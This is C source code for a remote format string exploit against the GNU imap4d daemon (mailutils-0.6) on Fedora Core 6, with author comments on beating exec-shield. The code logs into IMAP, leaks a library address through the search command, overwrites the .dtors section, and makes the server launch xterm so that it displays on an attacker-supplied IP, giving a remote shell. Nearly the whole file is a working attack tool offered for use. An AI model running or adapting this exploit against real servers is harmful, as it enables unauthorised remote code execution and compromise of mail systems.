/* ** ** Fedora Core 6 (exec-shield) based ** GNU imap4d mailutils-0.6 search remote format string exploit ** by Xpl017Elz ** ** Advanced exploitation in exec-shield (Fedora Core case study) ** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt ** ** Reference: http://www.securityfocus.com/bid/14794 (2005/09/09) ** http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=303 ** ** -- ** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. ** My World: http://x82.inetcop.org ** */ /* ** -=-= POINT! POINT! POINT! POINT! POINT! =-=- ** ** This vulnerability is one of the normal exploitation case under exec-shield. ** GNU imap4d can be run as a standalone deamon by using -d option and it inherits ** virtual address of parent process which mapped randomly. ** ** [root@localhost .libs]# ps -ef | grep imap4d | grep -v grep ** root 8312 1 0 20:01 ? 00:00:00 ./lt-imap4d -d ** [root@localhost .libs]# ** ** These are keys to get over some possible problems. ** ** * `One shot' exploit without brute-forcing. ** ** Sometimes you man need to do some brute-forcing to assume the library address ** which is mapped randomly. But this is not my recommendation. ** ** Because it is a format string attack, we can possibly get the ramdom address ** of the library. Using this technique, I could find exploitable do_system() ** address at once. but, unfortunately, it is not applicable to blind format string ** exploit by syslog(). ** ** * How to execute a remote shell. ** ** I decided to use xterm for this, but if sadly, there is no xterm on the target ** server then you should look for another way. because of the variableness ** of size of IP address, I felt a need for fitting the address within 10 bytes. ** ** Hacker's IP address would be a perfect demical numbers and it makes size ** of IP address same and shortens the string to overwrite. ** ** xterm exploit code includes do_system() address can be writen in 136 bytes ** of general exploit code. ** */
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h>
#define DEF_STR "x0x" #define PORT 143
#define DF_SFLAG 11 #define DF_OFFSET 29 #define DTOR_END_ADDR 0x08059268 #define DO_SYSTEM 0x828282 #define SHELL 0x3b6873 #define DEF_DO_SYSTEM_OFFSET 0x1fbf9 #define GET_DO_SYSTEM_SFLAG 38
#define XHOST_IP ""
void banrl(); void usage(); void re_connt(int sock); int setsock(char *host,int port);
long xterm_shell[]={ // do_system("xterm -di ip_addr"); 0x7478,0x7265, 0x206d,0x642d, 0x2069,0x4141, /* IP address */ 0x4141,0x4141, 0x4141,0x4141, 0x303a,0x0000 }; int xterm_ip_count=5;
int get_10_ip(char *ipbuf){ char tbuf[32]; int i=0; unsigned long ip,ip1,ip2,ip3,ip4; ip=ip1=ip2=ip3=ip4;
sscanf(ipbuf,"%d.%d.%d.%d",&ip1,&ip2,&ip3,&ip4); #define IP1 16777216 #define IP2 65536 #define IP3 256 ip=0; ip+=ip1 * (IP1); ip+=ip2 * (IP2); ip+=ip3 * (IP3); ip+=ip4;
memset((char *)ipbuf,0,256); sprintf(ipbuf,"%lu",ip); xterm_ip_count=5;
for(i=0;i<10;i+=2){ memset((char *)tbuf,0,sizeof(tbuf)); snprintf(tbuf,sizeof(tbuf)-1,"0x%02x%02x",ipbuf[i+1],ipbuf[i]);
ip=strtoul(tbuf,NULL,0); xterm_shell[xterm_ip_count++]=ip; } return 0; }
int send_exploit_code(int sock,unsigned long retloc,unsigned long retaddr,int sflag){ char buf[1024]; int i=0;
memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 search topic x"); i=strlen(buf); *(long *)&buf[i]=retloc; i+=4; if(retaddr==0){ retaddr+=0x10000; } sprintf(buf+i,"%%%lux%%%d$n\n",retaddr-i-DF_OFFSET,sflag);
send(sock,buf,strlen(buf),0); memset(buf,0,sizeof(buf)); while(recv(sock,buf,sizeof(buf)-1,0)){ if(strstr(buf,")")){ break; } } return 0; }
int main(int argc,char *argv[]){ int sflag=DF_SFLAG; unsigned long do_system_addr=DO_SYSTEM; unsigned long retloc=DTOR_END_ADDR; unsigned long shaddr=SHELL; char host[256]=DEF_STR; int port=PORT; extern char *optarg; int sock,i,r=0; char buf[1024]; char user[256]=DEF_STR; char pass[256]=DEF_STR; char *ptr=NULL; char xhost_ip_buf[256]=XHOST_IP;
memset((char *)buf,0,sizeof(buf)); memset((char *)user,0,sizeof(user)); memset((char *)pass,0,sizeof(pass));
(void)banrl(); while((sock=getopt(argc,argv,"R:r:D:d:H:h:P:p:F:f:I:i:U:u:S:s:"))!=EOF){ switch(sock){ case 'R': case 'r': retloc=strtoul(optarg,NULL,0); break; case 'D': case 'd': do_system_addr=strtoul(optarg,NULL,0); break; case 'H': case 'h': memset((char *)host,0,sizeof(host)); strncpy(host,optarg,sizeof(host)-1); break; case 'P': case 'p': port=atoi(optarg); break; case 'F': case 'f': sflag=atoi(optarg); break; case 'I': case 'i': memset((char *)xhost_ip_buf,0,sizeof(xhost_ip_buf)); strncpy(xhost_ip_buf,optarg,sizeof(xhost_ip_buf)-1); get_10_ip(xhost_ip_buf); break; case 'U': case 'u': memset((char *)user,0,sizeof(user)); strncpy(user,optarg,sizeof(user)-1); break; case 'S': case 's': memset((char *)pass,0,sizeof(pass)); strncpy(pass,optarg,sizeof(pass)-1); break; case '?': default: (void)usage(argv[0]); break; } } if(!strcmp(host,DEF_STR)||!strcmp(user,DEF_STR)||!strcmp(pass,DEF_STR)){ (void)usage(argv[0]); }
fprintf(stdout," [+] make socket.\n"); fprintf(stdout," [+] host: %s.\n",host); fprintf(stdout," [+] port: %d.\n",port); sock=setsock(host,port); re_connt(sock);
recv(sock,buf,sizeof(buf)-1,0); if(strstr(buf,"IMAP4rev1")){ fprintf(stdout," [+] OK, IMAP4rev1.\n"); } else { fprintf(stdout," [-] Ooops, no match.\n\n"); close(sock); exit(-1); }
memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 login \"%s\" \"%s\"\n",user,pass); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); while(recv(sock,buf,sizeof(buf)-1,0)){ if(strstr(buf," Completed")){ fprintf(stdout," [+] login completed.\n"); break; } else if(strstr(buf," rejected")){ fprintf(stdout," [-] login failed.\n\n"); exit(-1); } }
memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 select \"inbox\"\n"); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); while(recv(sock,buf,sizeof(buf)-1,0)){ if(strstr(buf," Completed")){ fprintf(stdout," [+] select success.\n"); break; } else if(strstr(buf," NO SELECT")){ fprintf(stdout," [-] select failed.\n\n"); exit(-1); } }
/* get, do_system address */ fprintf(stdout," [+] find do_system address.\n"); memset((char *)buf,0,sizeof(buf)); snprintf(buf,sizeof(buf)-1,"1 search topic |%%%d$x|\n",GET_DO_SYSTEM_SFLAG); send(sock,buf,strlen(buf),0); memset((char *)buf,0,sizeof(buf)); recv(sock,buf,sizeof(buf)-1,0); if(strstr(buf,"|")){ ptr=(char *)strstr(buf,"|"); sscanf(ptr,"|%x|\n",&do_system_addr); } do_system_addr-=DEF_DO_SYSTEM_OFFSET;
fprintf(stdout," [+] make exploit code.\n"); fprintf(stdout," [+] retloc address: %p.\n",retloc); fprintf(stdout," [+] do_system address: %p.\n",do_system_addr); fprintf(stdout," [+] send exploit code.\n");
send_exploit_code(sock,retloc,do_system_addr,sflag); for(i=0,r=4;i<(sizeof(xterm_shell)/4);i++,r+=2){ send_exploit_code(sock,retloc+r,xterm_shell[i],sflag); }
#define LOGOUT_CMD "1 logout\n" send(sock,LOGOUT_CMD,strlen(LOGOUT_CMD),0); sleep(1);
recv(sock,buf,sizeof(buf)-1,0); close(sock);
if(strstr(buf,"BYE")&&strstr(buf,"LOGOUT")){ fprintf(stdout," [+] logout success.\n\n"); } else { fprintf(stdout," [-] logout failed.\n\n"); exit(-1); } exit(0); }
void banrl(){ fprintf(stdout,"\n FC6 (exec-shield) based GNU imap4d mailutils-0.6 search remote exploit\n"); fprintf(stdout," by Xpl017Elz\n\n"); }
void usage(char *arg0){ fprintf(stdout," Usage: %s -options arguments\n\n",arg0);
fprintf(stdout,"\t-r [retloc] - .dtors address (default: %p).\n",DTOR_END_ADDR); fprintf(stdout,"\t-d [do_system] - do_system address (auto).\n"); fprintf(stdout,"\t-h [host] - target hostname or ip.\n"); fprintf(stdout,"\t-p [port] - target port number (auto).\n"); fprintf(stdout,"\t-f [sflag] - $-flag number (default: 11).\n"); fprintf(stdout,"\t-i [ip] - attacker xhost ip.\n"); fprintf(stdout,"\t-u [user] - imap user id.\n"); fprintf(stdout,"\t-s [pass] - imap user pass.\n"); fprintf(stdout,"\t-? - help information.\n\n");
fprintf(stdout," Example: %s -hhost -iattacker -ux82 -spass\n\n",arg0); exit(-1); }
void re_connt(int sock){ if(sock==-1) { fprintf(stdout," [-] Failed.\n\n"); exit(-1); } } int setsock(char *host,int port) { int sock; struct hostent *he; struct sockaddr_in x82_addr; if((he=gethostbyname(host))==NULL) { return(-1); }
if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF) { return(-1); } x82_addr.sin_family=AF_INET; x82_addr.sin_port=htons(port); x82_addr.sin_addr=*((struct in_addr *)he->h_addr); bzero(&(x82_addr.sin_zero),8); if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF) { return(-1); } return(sock); }
/* eoc */